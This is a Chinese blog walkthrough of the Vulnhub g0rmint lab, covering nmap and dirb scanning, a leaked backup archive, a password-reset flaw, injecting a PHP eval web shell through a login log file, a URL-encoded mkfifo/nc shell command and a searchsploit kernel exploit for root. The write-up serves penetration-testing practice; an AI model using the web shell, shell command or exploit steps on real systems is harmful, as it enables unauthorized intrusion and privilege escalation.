2020-12-08

最新推荐文章于 2024-07-10 17:18:35 发布
最新推荐文章于 2024-07-10 17:18:35 发布
阅读量185 收藏
点赞数
分类专栏: 靶场 文章标签: 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wahhh123admin/article/details/110880126
版权

&&信息收集&&

扫描ip
nmap 192.168.99.0/24
在这里插入图片描述

查看详细信息和是否有隐藏端口
nmap -A -p- 192.168.99.32
在这里插入图片描述
好像并没有什么隐藏端口
目录扫描
在这里插入图片描述
访问
在这里插入图片描述

&&渗透&&

访问这个目录(一个登陆框)
在这里插入图片描述
查看页面源代码(存在一个备份目录)
在这里插入图片描述
dirb扫描
dirb http://192.168.99.32/g0rmint/s3cretbackupdirect0ry
在这里插入图片描述
访问(有一个backup.zip)
在这里插入图片描述
下载到攻击机
wget http://192.168.99.32/g0rmint/s3cretbackupdirect0ry/backup.zip
在这里插入图片描述
把文件拖到物理机进行解压
在这里插入图片描述

代码审计
先看登陆框的login.php代码
发现登陆失败就会产生一个日志
在这里插入图片描述
看看这个addlog的代码(会产生出一个.php文件在这个目录下)
在这里插入图片描述
查看sql文件可以看到一个插入文件
在这里插入图片描述
发现账号密码
md5破解(密码demo)
在这里插入图片描述
尝试登陆

在这里插入图片描述
没登陆上
继续代码审计,发现只要知道账号和邮箱就可以重设密码为一个hash的值
在这里插入图片描述
搜索
在这里插入图片描述
找到一个账号和邮箱,尝试重设密码(成功)
在这里插入图片描述
将hash算出,得到密码(0973f4aaf20b6099d47e)
在这里插入图片描述
登陆(成功)
在这里插入图片描述
访问日志
http://192.168.99.33/g0rmint/s3cr3t-dir3ct0ry-f0r-l0gs/2020-12-08.php
在这里插入图片描述
登陆框插入phpinfo();
在这里插入图片描述
访问日志(插入成功)
在这里插入图片描述
写入一句话木马

<?php eval($_GET[cmd]);?>

在这里插入图片描述
访问,成功
在这里插入图片描述
反弹shell(主要是通过创建管道进行连接)
‘mkfifo /tmp/t’;
‘cat /tmp/t | /bin/sh -i 2>&1 | nc -l 8888 > /tmp/t’;
进行url编码
%60mkfifo%20%2ftmp%2ft%60%3B
在这里插入图片描述

%60cat%20%2ftmp%2ft%20%7C%20%2fbin%2fsh%20-i%202%3E%261%20%7C%20nc%20-l%208888%20%3E%20%2ftmp%2ft%60%3B
在这里插入图片描述

nc监听
在这里插入图片描述

&&提权&&

查看版本
在这里插入图片描述
查找poc
searchsploit Ubuntu 16.04
在这里插入图片描述
将poc存放到www下
在这里插入图片描述
靶机下载
在这里插入图片描述
脚本编译
在这里插入图片描述
没有这个命令那只能在攻击机编译在下载到靶机
gcc 44298.c -o exp
在这里插入图片描述
在这里插入图片描述
脚本赋予权限
chmod 775 exp
在这里插入图片描述

执行
./exp
在这里插入图片描述

wahhh123admin
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[Vulnhub]node
cosmoslin的博客
09-16 5069
渗透测试过程记录 测试人员:cosmos 目标地址:192.168.131.132:3000 目标账号:未知 目标主机:未知 测试记录 前期信息搜集阶段略 打开192.168.131.132:3000 利用网站的黑盒测试做信息搜集 http://192.168.131.132:3000/ http://192.168.131.132:3000/login http://192.168.131.132:3000/profiles/tom http://192.168.131.132:3000/profil
2020-05-31
GJJailang的博客
05-31 866
现在后端不做云计算,大数据,人工智能,底层程序员是不是只剩增删改查了。感觉自己混了两年混成运维了。
2020-06-07
lyyzxl的博客
06-07 2721
arcgis engine 实现栅格计算器,包括数学运算、逻辑运算、三角函数运算和代数运算。有大佬能帮一下吗?arcgis用10.2版本,环境用vs2015,代码加注释。求大佬。
2020-03-14
东哥的博客
03-14 996
<% } %> 这个怎么改成随机
2020-05-09
wanghuanll的博客
05-09 1225
Dⅹ3.4
2020-04-09
zero_one666的博客
04-09 1271
每日书单 每日书单 1/ There is only one time in a person’s life when he can make a difference. That is the moment. 2/Can coral be kept away from the erosion of stormy waves? It’s nothing more than to bury thei...
2020-07-02
thinkoutresult的博客
07-02 1016
标题java String类型复杂json串如果解析 1.根据json串解析相应的成相应的entity 2. Gson gson = new Gson(); 3. gson.fromJson(String类型复杂的json串,根据json串解析的类entity.class ) 4. 注意解析成entity的类其他的类需要注明是public,如果要张一个entity里面去弄的话 ...
2020-05-10
zcz19920114的博客
05-10 1176
本人camera hal小白,无从下手有没有camera hal 的大佬可以指点一下或者提供一点资料,在此谢了
2020-04-10
m0_46591785的博客
04-10 2327
Super关键字 可以访问父类中定义的属性 可以调用父类中定义的成员方法 可以在子类构造器中调用父类构造器 .子类所有的构造器默认都访问父类中空参数的构造器 .子类一定会调用父类构造器(默认过程调用无参) //如果没有显示定义构造方法,Java编译阶段提供一个默认构造方法 //如果定义了自己的构造器,Java使用自己的构造器 //父类所有的构造器:子类必须实现它,子类默认当中一定使用到了父类的构造...
2020-12-08】2019-2020年中国动画电影市场研究报告
qianchou2的博客
12-08 3477
1、2015-2020年中国动画电影市场综述 大盘趋势:动画电影不断突破票房天花板,2019年达到峰值 2015-2020年,中国动画电影市场整体票房呈曲折上涨态势。经历了2015-2016年小高潮、2017-2018相对低迷的市场行情之后,2019年现象级电影《哪吒之魔童降世》贡献50亿票房,带动全年动画电影票房达90亿,为历年来最高。2020年疫情影响下,动画电影票房跟随大盘下滑。 国产动画电影竞争力不断增强,2018-2020年动画电影票房冠军均为国产,且国产动画电影票房从2019年开始反超进口
2020-12-08-刘永鑫1
08-08
中国农业大学国家农业绿色发展研究院 微生物专题报告 (十五)报告题目:宏基因组数据分析的机遇与挑战报 告 人:刘永鑫 工程师报告时间: 2 0 2 0 年 1
食品饮料行业11月阿里渠道线上数据分析:白酒延续强势,休闲食品表现平淡_2020-12-08_华泰证券.pdf
09-01
报告标题和描述提到了2020年11月食品饮料行业在阿里巴巴平台上的线上销售数据分析,重点关注白酒和休闲食品两大板块。以下是基于这些信息详细阐述的相关知识点: 1. **白酒市场**: - **销售额增长**:11月白酒在...
2020-05-05-12-49-45.mp4
05-05
简单的Fluent热流固耦合案例分析,模型参考意义不大,主要讲述了热流固耦合的思想,对快速入手软件有很大的帮助
Draft 2020-08-12 12:11:17-数据集
03-25
数据集是进行数据分析和机器学习任务的基础,它们包含了大量的实例数据,可以用于训练模型或评估模型性能。在本数据集中,我们有两个主要的文件:`train.csv` 和 `train_44.csv`。 `train.csv` 文件很可能是训练集...
移动互联安全扩展要求测评项
hakksjss的博客
07-10 1134
应为无线接入设备的安装选择合理位置,避免过度覆盖和电磁干扰。无线接入设备的安装位置选择不当,易被攻击者利用,特别是攻击者会通过无线信号过度覆盖的弱点进行无线渗透攻击,因此要选择合理的位置安装无线接入设备。
中小学校园EasyCVR视频综合监管方案:构建安全、智能的校园环境
最新发布
TSINGSEE青犀视频官方技术博客
07-10 1178
针对校园食堂后厨、仓库、配菜、清洗等监控区域的环境卫生与安全等进行全面的监管,及时发现违规异常情况,并能向监管人员及时发送告警信息,保障在校师生的食品与饮食安全
[图解]SysML和EA建模住宅安全系统-14-黑盒系统规约
rolt的专栏
07-10 809
系统的外部可观察行为和物理特征
Foxit Reader:高效、安全、多功能的PDF阅读器技术解析
运维人生
07-10 516
由福建福昕软件开发股份有限公司开发,是一款轻量级、高效且功能丰富的PDF阅读器。它不仅拥有比同类产品更小的安装包体积和更快的打开速度,还全面支持最新的PDF文档属性,并提供了丰富的插件和自定义选项,极大地提升了用户体验。
网络安全威胁情报到底是什么
学-> 思->用
07-10 398
网络安全威胁情报是提升组织安全态势的重要手段,通过收集和分析各种威胁信息,组织可以更有效地预防、检测和响应网络攻击。威胁情报的构成要素包括指标、TTPs、威胁行为体、漏洞、恶意软件和攻击事件。通过合理应用威胁情报,组织可以增强防御能力、提升事件响应效率,并通过情报共享与合作,共同应对复杂多变的网络威胁。
A集合: [{begintime:2020-01-01 00:04:00,endtime:2020-01-01 00:06:00}, {begintime:2020-01-01 00:01:05,endtime:2020-01-01 00:03:15}, {begintime:2020-01-01 00:09:00,endtime:2020-01-01 00:10:00}, {begintime:2020-01-01 00:07:35,endtime:2020-01-01 00:08:40}, {begintime:2020-01-01 00:12:00,endtime:2020-01-01 00:17:00}, {begintime:2020-01-01 00:12:05,endtime:2020-01-01 00:13:10}, {begintime:2020-01-01 00:19:00,endtime:2020-01-01 00:21:00}, {begintime:2020-01-01 00:15:20,endtime:2020-01-01 00:20:45}]  期望得到的输出结果: [{begintime:2020-01-01 00:01:05,endtime:2020-01-01 00:03:15}, {begintime:2020-01-01 00:04:00,endtime:2020-01-01 00:06:00}, {begintime:2020-01-01 00:07:35,endtime:2020-01-01 00:08:40}, {begintime:2020-01-01 00:09:00,endtime:2020-01-01 00:10:00}, {begintime:2020-01-01 00:12:00,endtime:2020-01-01 00:21:00}]
04-23
2020-01-01 00:04:00,endtime:2020-01-01 00:06:00}, {begintime:2020-01-01 00:07:35,endtime:2020-01-01 00:08:40}, {begintime:2020-01-01 00:09:00,endtime:2020-01-01 00:10:00}, {begintime:2020-01-01 00:12:...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值